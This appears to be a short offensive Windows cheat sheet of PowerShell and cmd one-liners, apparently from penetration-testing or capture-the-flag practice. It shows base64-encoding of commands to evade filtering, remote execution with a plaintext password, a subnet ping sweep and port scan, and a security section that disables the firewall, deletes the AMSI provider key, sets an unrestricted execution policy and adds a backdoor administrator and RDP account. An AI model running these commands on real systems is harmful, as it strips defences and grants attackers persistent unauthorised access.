Windows Tricks
PowerShell encoded base64
Create a base64 payload to avoid bad characters.
$ echo -n 'ping -n 2 10.10.14.2' | iconv -t utf-16le | base64 -w 0
cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==
Payload: cmd /c powershell -nop -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==
Run command as User (with creds)
$pass = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("disco\\Alice", $pass)
Invoke-Command -ComputerName disco -Credential $cred -ScriptBlock {whoami}
List running process with args
WMIC path win32_process get Caption,Processid,Commandline
Scan for hosts and open ports in subnet
PS > 1..254 | ForEach-Object {Test-Connection -ComputerName "172.16.2.$_" -Count 1 -ErrorAction SilentlyContinue}
PS > 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.2.101",$)) "Port $ is open!"} 2>$null
PowerShell
c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
set PATH=%SystemRoot%\system32;%SystemRoot%;
Search for files
Get-Childitem –Path C:\ -Include *filetosearch* -Recurse -ErrorAction SilentlyContinue
Windows Security
Disable Firewall
NetSh Advfirewall set allprofiles state off
Disable AMSI
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Disable Defender
Execution Policy
Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
Add a RDP user
net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD